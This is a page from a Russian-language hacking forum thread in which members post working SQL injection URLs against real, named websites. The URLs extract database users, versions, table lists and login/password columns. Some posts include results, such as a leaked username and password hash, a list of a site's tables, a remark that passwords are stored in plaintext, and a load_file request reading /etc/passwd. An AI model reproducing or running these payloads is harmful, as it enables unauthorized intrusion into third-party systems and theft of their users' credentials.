ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2511  
Старый 15.06.2007, 11:53
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://tj.cafspeech.kz/site.php?lan=english&id=2&newsid=-180+union+select+version()/*
Код:
http://azgroup.kz/binar.php?id=-2'+union+select+concat(user,char(58),password),version(),3,4,5,6,7,8,9,10,11,12+from+mysql.user/*

Последний раз редактировалось _Pantera_; 15.06.2007 в 12:43..
 
Ответить с цитированием

  #2512  
Старый 15.06.2007, 16:47
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

http://www.voinaimir.ru

Там почти на каждой странице скуля:

Код:
http://www.voinaimir.ru/dicdefinition/?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8/*
http://www.voinaimir.ru/dicchapter/?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6/*
http://www.voinaimir.ru/reviewlist/more/?id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11/*
http://www.voinaimir.ru/news/more/?id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11/*
 
Ответить с цитированием

  #2513  
Старый 15.06.2007, 18:36
Аватар для random
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Код:
http://www.coservices.be/main.php?lang=FR&id=-79+union+select+1,2,convert(concat(username,0x3a,password)+using+latin1),4,5,6,7+from+users/*
wouter:35bd37524b997d6ddd579756fde4756e

Код:
http://fots.ru/gal/?gal=-1947+union+select+1,2,3,version(),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #2514  
Старый 15.06.2007, 23:03
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

хз, от чего пасс, но вывод в тайтле)
cgi-формы логина в наличии есть, но там другая инфа нужна.. остальные таблицы не подбирал

Код:
http://www.sinauer.com/detail.php?id=-1'+union+select+concat(user,0x3a,pass)+from+users/*
антибаян не пашет, не проверил.. мб кто докопается, все-таки pr = 6 )
 
Ответить с цитированием

  #2515  
Старый 15.06.2007, 23:09
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://law-c.ru/document.php?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5/*
----------------------------------

Код:
http://www.namakon.ru/articles.php?id=9999999999+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9/*
/etc/passwd:

Код:
http://www.namakon.ru/articles.php?id=9999999999+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8,9/*
----------------------------------

Код:
http://www.vch.ru/cgi-bin/guide.cgi?table_code=12&action=show&id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8/*
Код:
http://www.vch.ru/cgi-bin/guide.cgi?table_code=12&action=show&id=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables/*
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS

ALPHABET
ALPHABET_ENG
ANONS
BELARUS
BELARUS_V
CARRIERS
CARRIERS_ENG
CONTENT
CONTENT_ENG
CRYPTO
CUSTOMS
CUSTOMS1
CUST_BOD
CUST_BOD_ENG
CUST_BOD_MOS
CW
DEPARTMENTS
DEPARTMENTS_ENG
DOCS
DOCS_EMCTC
DOCS_ENG
DOCS_T
DUTYFREE
ECONOMY
ECONOMY_ENG
EMCTC_CONTENT
EMCTC_NEWS
EMCTC_NEWS_SECTIONS
EVROAZS
EVROAZS_ENG
HIT
INFRINGERS1
INFRINGERS2
KAZAHSTAN
KAZAHSTAN_V
KLIENTI
LINKS
LOGISTIC
LOGISTIC_ENG
NEWS
NEWS_ENG
OTO
POPULYR
PRACTICE
QUESTIONS_VCH
REFERATS
REVIEW
REVIEW_ENG
RUMORS
RUMORS_ENG
SEMINARS
SHIFR
SHIT
SearchStrings
TEMP
TEXT
TEXT_ENG
TW
UKRAINA
UKRAINA_V
VASYANYA
VTOROSSII
WAREHOUSES
aaa
banners
banners_eng
baz_sklad
doska_bodies
doska_headers
garant_banks
item
item_group
job_bodies
job_headers
price30
tam
 
Ответить с цитированием

  #2516  
Старый 15.06.2007, 23:27
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://www.turimpex.ru/pg.php?id=-2'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13/*
Код:
http://oncoplastic.ru/rak.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(email,0x78),0x78),3,4,5,6+from+admin/*
Код:
http://www.datacd.ru/faq.php?id=-2+union+select+1,version(),3+from+news/*
 
Ответить с цитированием

  #2517  
Старый 16.06.2007, 00:47
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Национальная Академия Социальных Технологий

www.st-academy.ru


Достаем имя пользователя, базы и версию мускула:
Код:
http://st-academy.ru/nast/news/?id=-1+union+select+1,concat(user(),0x3b,database()),3,convert(version(),char),5,6,7,8,9/*
Форум самописный и там ничего интересного, зато есть таблица user:
Код:
http://st-academy.ru/nast/news/?id=-1+union+select+1,concat(login,0x3b,email,0x3b,icq,0x3b,pass),3,4,5,6,7,8,9+from+user+limit+1,20/*
пароли в открытом виде, лимит вам в помощь
 
Ответить с цитированием

  #2518  
Старый 16.06.2007, 08:38
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.music3000.com.ua/?p=club&sp=news&id=-348+union+select+concat(login,char(58),pass)+from+users/*

Последний раз редактировалось KPOT_f!nd; 16.06.2007 в 08:41..
 
Ответить с цитированием

  #2519  
Старый 16.06.2007, 11:13
Аватар для LoneWolf666
LoneWolf666
Постоянный
Регистрация: 09.12.2005
Сообщений: 377
Провел на форуме:
2046072

Репутация: 362
По умолчанию

http://www.xclan.ru/showthread.php?t=425
дак это кто из вас нашёл то?
а так +
 
Ответить с цитированием

  #2520  
Старый 16.06.2007, 13:21
Аватар для random
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Код:
http://www.vigray.ru/heading/index.php?iid=-237+union+select+1,2,concat(login,0x3a,pass),4,5,6,7+from+users/*
Код:
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ